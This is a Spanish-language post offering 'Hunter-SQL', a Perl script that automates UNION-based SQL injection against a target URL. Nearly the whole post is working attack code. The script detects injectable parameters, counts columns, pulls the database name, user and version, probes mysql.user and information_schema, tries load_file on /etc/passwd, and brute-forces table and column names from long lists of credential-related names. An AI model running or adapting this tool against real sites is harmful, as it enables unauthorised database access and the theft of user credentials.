Lo que hace es
*Comprueba vulnerabilidad
*Busca columnas con 2 tecnicas diferentes
*Saca informacion de base de datos
*Comprueba mysql y schema como load file
*Busca tablas y columnas
Aca el code
#Name program = Hunter-SQL
#Version = 1.0
#Autor = Guason
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table',
'miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass',
'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email',
'user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha',
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur',
'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
my $host = $ARGV[0];
if (!$ARGV[0]) {
print q (
¦ ¦ ¦ ¦ ¦ ¦ ¦¦¦ ¦¦¦¦ ¦¦¦ ¦¦¦ ¦¦ ¦
¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦¦¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦¦¦ ¦¦¦ ¦¦¦¦ ¦¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦¦ ¦
¦ ¦ ¦¦ ¦ ¦ ¦ ¦¦¦¦ ¦ ¦ ¦¦¦ ¦ ¦ ¦¦¦¦
Modo de uso = perl hunter-sql.pl http://host.com/index.php?id=
Written by Guason
);
exit 1;
}
open ( FILE , ">>c:/hunter-log.txt" );
$cmn.= "+";
$cfin.="--";
print "\n\n";
print q (
¦ ¦ ¦ ¦ ¦ ¦ ¦¦¦ ¦¦¦¦ ¦¦¦ ¦¦¦ ¦¦ ¦
¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦¦¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦¦¦ ¦¦¦ ¦¦¦¦ ¦¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦
¦ ¦ ¦ ¦ ¦ ¦¦ ¦ ¦ ¦ ¦ ¦ ¦ ¦¦ ¦
¦ ¦ ¦¦ ¦ ¦ ¦ ¦¦¦¦ ¦ ¦ ¦¦¦ ¦ ¦ ¦¦¦¦
);
print "[?] Verificando vulnerabilidad de $host.....\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cfin;
$response=get($sql);
if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/)
{
print "[+] Vulnerable, Siguiendo Parametros del Programa\n\n";
print FILE "\n\n";
print FILE "TARGET = $host\n\n";
} else {
print "[-] El sitio NO es vulnerable\n\n";
exit 1;
}
print "[+] Buscando numeros de columnas\n\n";
for ($column = 0 ; $column < 45; $column ++)
{
$union.=','.$column;
$inyection.=','."0x677561736f6e";
if ($column == 0)
{
print FILE "\nNumero de columnas:\n\n";
$inyection = '';
$union = '';
}
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0x677561736f6e".$inyection.$cfin;
$response=get($sql);
if($response =~ /guason/)
{
$column ++;
print "[+] El sitio tiene $column columnas\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
print FILE "\n\n";
print FILE"Inyeccion sql = $sql\n";
&come;
}
}
&come;
sub come {
print "[+] Extrayendo base de datos\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
my $url = $sql ;
($ura,$numeros) = $url =~ m{(.*)\+(.*)$}g;
print "\n";
print "Extrayendo datos de la url\n\n";
print "Url = $ura\n";
print "Numeros = $numeros\n";
print "\n";
$especial = venga($numeros);
$especial = "4";
$string_datos_db = 'concat(0x494e,database(),0x3A,user(),0x3A,version(),0x46494e)';
$numeros =~s/$especial/$string_datos_db/;
$url = $ura."+".$numeros;
print "\n\n";
print "$url\n";
my $cnx = LWP::UserAgent->new() or die;
$go=$cnx->get($url);
my $source = $go->content();
($db,$user,$version) = $source =~ m{IN(.*):(.*):(.*)FIN}g;
print "\n\n";
print "\n\n";
print "Extrayendo base de datos\n\n";
print "Nombre de base = $db\n";
print "User = $user\n";
print "Version db = $version\n";
print "\n\n";
print FILE "\n\n";
print FILE "#############################################\n";
print FILE "Extrayendo base de datos\n\n";
print FILE "Nombre de base = $db\n";
print FILE "User = $user\n";
print FILE "Version db = $version\n";
print FILE "#############################################\n";
print FILE "\n\n";
sub venga{
local $numeros = $_[0];
$numeros = split(",",$numeros);
for ($x=1;$x<=$numeros;$x++){
$url_hex = $url_hex.hex_sql("ACA$x").",";
}
chop($url_hex);
$url_inject = $ura."+".$url_hex."--";
print "\n\n";
print "$url_inject\n";
my $cnxe = LWP::UserAgent->new() or die;
$go=$cnxe->get($url_inject);
my $source_url_hex = $go->content();
( @match_ACA) = $source_url_hex =~ m{ACA(\d+)}g;
$especial = @match_ACA[int(rand( @match_ACA))];
return $especial;
}
sub hex_sql($) {
(my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;return "0x$str";
}
print "[+] Verificando existencia de Information_Schema\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0x677561736f6e".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql);
if($response =~ /guason/)
{
print "[+] Schema esta activado.......\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
print FILE "\n\nInyeccion SQL para schema:\n\n$sql\n"
}
else
{
print "[-] Information Schema NO esta activada\n\n";
}
print "[+] Verificando existencia de Mysql User\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0x677561736f6e".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql);
if($response =~ /guason/)
{
print "[+] Mysql User esta activo\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
print FILE "Inyeccion SQL para mysqluser = $sql\n\n";
}
else
{
print "[-] Mysql User NO esta activado\n\n";
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
print "[+] Verificando existencia de LOAD-FILE...\n\n";
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
$response=get($sql);
if($response =~ /root:x:/)
{
print "[+] LOAD-FILE esta activo\n\n";
print FILE "load_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n\n";
} else {
print "[-] LOAD-FILE NO esta activado\n\n";
}
print "[+] Buscando Tablas.......\n\n";
print FILE " [Tablas]:\n\n";
foreach $tabla(@nombretabla)
{
chomp($tabla);
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."0x677561736f6e".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql);
if($response =~ /guason/)
{
print "[?] Se encontro $tabla\n";
print FILE "$tabla\n";
}
}
print "\n\n";
print "Escribe el nombre de la tabla a brutear =";
$tabla = <STDIN>;
chomp $tabla;
print "\n\n";
print FILE "\n\n[Columnas de la tabla $tabla]:\n\n";
foreach $columna(@nombrecolumna)
{
chomp($columna);
$sql=$host."-1".$cmn."union".$cmn."select".$cmn."concat(0x677561736f6e,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql);
if ($response =~ /guason/)
{
print "[?] Se encontro $columna\n";
print FILE "$columna\n";
}
print "\n\n";
print "[?] El programa ha finalizado........\n\n";
exit 1;
}
}